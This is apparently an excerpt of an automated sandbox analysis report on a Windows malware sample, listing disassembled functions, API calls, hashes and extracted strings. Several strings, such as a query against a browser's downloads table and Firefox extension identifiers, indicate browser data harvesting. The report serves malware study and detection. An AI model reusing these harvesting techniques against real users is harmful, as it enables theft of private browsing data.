                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleWrite
                                      • String ID: &+0
                                      • API String ID: 1065093856-2468884101
                                      • Opcode ID: c3aa93e318a48a57bf99f69fc1792839ce4c055f07ed2eee0eab7c674cc2165a
                                      • Instruction ID: 539d3a066335ddfaa4e98dae2e1b7d36352fd539c587cd6ac504d96ccc140ddd
                                      • Opcode Fuzzy Hash: c3aa93e318a48a57bf99f69fc1792839ce4c055f07ed2eee0eab7c674cc2165a
                                      • Instruction Fuzzy Hash: F5F0AF315502187BEA20EF60EC4AFFA776CDF117A0F004265FE05A62C0DBA0AD168AE0
                                      Function 002F7D70 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 245COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$lstrlen
                                      • String ID: Downloads$SELECT target_path, tab_url from downloads
                                      • API String ID: 2762123234-2176162482
                                      • Opcode ID: afc4687a823e7751790bf810f0c4ba289e3d3cb95633d29ed91f69ba7d0c5bb5
                                      • Instruction ID: 757835457aae1bd2a0c64ece71fa0c5b150e424b5d4d63b274d080a878a61ddb
                                      • Opcode Fuzzy Hash: afc4687a823e7751790bf810f0c4ba289e3d3cb95633d29ed91f69ba7d0c5bb5
                                      • Instruction Fuzzy Hash: C691067192010DABDB59EBA0CE56DFEB378AF54780F504538F60272191EF74AA28CF61
                                      Function 002FF190 Relevance: 6.2, APIs: 4, Instructions: 171COMMON
                                      Download Yara Rule
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00000000), ref: 002FF1E1
                                      • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 002FF22D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryVirtual
                                      • String ID:
                                      • API String ID: 1804819252-0
                                      • Opcode ID: e0318bdd681fd94c1e0703256955d8c0c4a1d4c847e2ff56baf7d2332a51473e
                                      • Instruction ID: a9cfea75d37e36d437a7275b57bff61348ff211ae7ddd5d1d70fb79eba925d87
                                      • Opcode Fuzzy Hash: e0318bdd681fd94c1e0703256955d8c0c4a1d4c847e2ff56baf7d2332a51473e
                                      • Instruction Fuzzy Hash: 2B51C076A1001DABEB14CE68DD40ABEB3EAEF88340F148139FE09E3340D635DD118BA1
                                      Function 002FB180 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 157stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                        • Part of subcall function 00300DA0: LocalAlloc.KERNEL32(00000040,002F87D9,?,?,?,?,002F87D8,00000000,00000000), ref: 00300DBC
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00313544,003101E9), ref: 002FB224
                                      • lstrlen.KERNEL32(00000000), ref: 002FB240
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 161838763-3310892237
                                      • Opcode ID: 4e10920772b3c997ea3acb245fdb0c48bef8af49087a2b0190bc70f991d9a7f4
                                      • Instruction ID: 14f190aadc0aaf7a2c04fa4504edaebbd620087879b0c870c9206a88efc07900
                                      • Opcode Fuzzy Hash: 4e10920772b3c997ea3acb245fdb0c48bef8af49087a2b0190bc70f991d9a7f4
                                      • Instruction Fuzzy Hash: 5851137192010D6BDB58FB70DE669FDB739AF547C0F404138FD0262291EF64AA28CEA1
                                      Function 002FFDE0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 002FFE02
                                      • GetLastError.KERNEL32 ref: 002FFE10
                                      • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 002FFE48
                                        • Part of subcall function 00300B20: GetProcessHeap.KERNEL32(00000000,002F66B7,?,002F66B7,?), ref: 00300B2D
                                        • Part of subcall function 00300B20: HeapFree.KERNEL32(00000000,?,002F66B7,?), ref: 00300B34
                                      • wsprintfA.USER32 ref: 002FFE92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HeapInformationLogicalProcessor$ErrorFreeLastProcesswsprintf
                                      • String ID:
                                      • API String ID: 837085947-0
                                      • Opcode ID: f8c5f1be7eb61f9dae5a531a25f6b449bfbf25949a020e961825876a4fecf49f
                                      • Instruction ID: 2d1588766ede766c49dd847fd797d947c0775c5ae0550b71078a504bcb5192b1
                                      • Opcode Fuzzy Hash: f8c5f1be7eb61f9dae5a531a25f6b449bfbf25949a020e961825876a4fecf49f
                                      • Instruction Fuzzy Hash: CA213332E1122EA7DB219F64AD40ABFB7A8EF40B50F180174EE0896213E7319E2586D1
                                      Function 0030A530 Relevance: 6.1, APIs: 4, Instructions: 80timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,0030BE6F), ref: 0030A568
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0030BE6F), ref: 0030A576
                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0030BE6F), ref: 0030A590
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0030A5B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 568878067-0
                                      • Opcode ID: 818412e8e8a0b6793b022224b6fdc477e50400084c033ae3e5f8a8bee80d677a
                                      • Instruction ID: 857bb248490c173523369ac482d8f031a8a5884b11b750d832b49b78bf1be473
                                      • Opcode Fuzzy Hash: 818412e8e8a0b6793b022224b6fdc477e50400084c033ae3e5f8a8bee80d677a
                                      • Instruction Fuzzy Hash: E2315E71D10B189FDB19CFA9C890AAAFBF5FB48304B008A2EE19AD3750D770A504CF54
                                      Function 00300F90 Relevance: 6.0, APIs: 4, Instructions: 37fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00300FAD
                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00300FBF
                                      • CloseHandle.KERNEL32(00000000), ref: 00300FCA
                                      • CloseHandle.KERNEL32(00000000), ref: 00300FD9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandle$CreateSize
                                      • String ID:
                                      • API String ID: 4148174661-0
                                      • Opcode ID: fe457b3fb61764a6c1af3d2fb60293778aaf8336378d4b9063d34a123fbefbf9
                                      • Instruction ID: 1a5ada2b4a8ab1a339c1cfd0164635ae0f6eabed3dada54af71ca0f6c12247cf
                                      • Opcode Fuzzy Hash: fe457b3fb61764a6c1af3d2fb60293778aaf8336378d4b9063d34a123fbefbf9
                                      • Instruction Fuzzy Hash: 5AF0B436641218ABE7309BA8AC0DF9A776CEF09711F000245FD04B31D0EB707A0656A0
                                      Function 002FFB60 Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFB6E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FFB75
                                      • GetLocalTime.KERNEL32(?), ref: 002FFB81
                                      • wsprintfA.USER32 ref: 002FFBAD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: 1c797eccddc58f51d73e04e76399793b1ada1759766da1e736d24c16007c7c92
                                      • Instruction ID: 7f1ca562027b953304524cb87e954cd3648ced0c9466dae34f4f889ec997fa68
                                      • Opcode Fuzzy Hash: 1c797eccddc58f51d73e04e76399793b1ada1759766da1e736d24c16007c7c92
                                      • Instruction Fuzzy Hash: 83F0B4B1904128BBD710ABD59C089FF77FCFF48B02F000149FA4591180E7785955E3B1
                                      Function 002FDAB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FDB25
                                      • memcpy.MSVCRT(?,?,?), ref: 002FDB76
                                        • Part of subcall function 002FD9C0: std::_Xinvalid_argument.LIBCPMT ref: 002FD9DA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
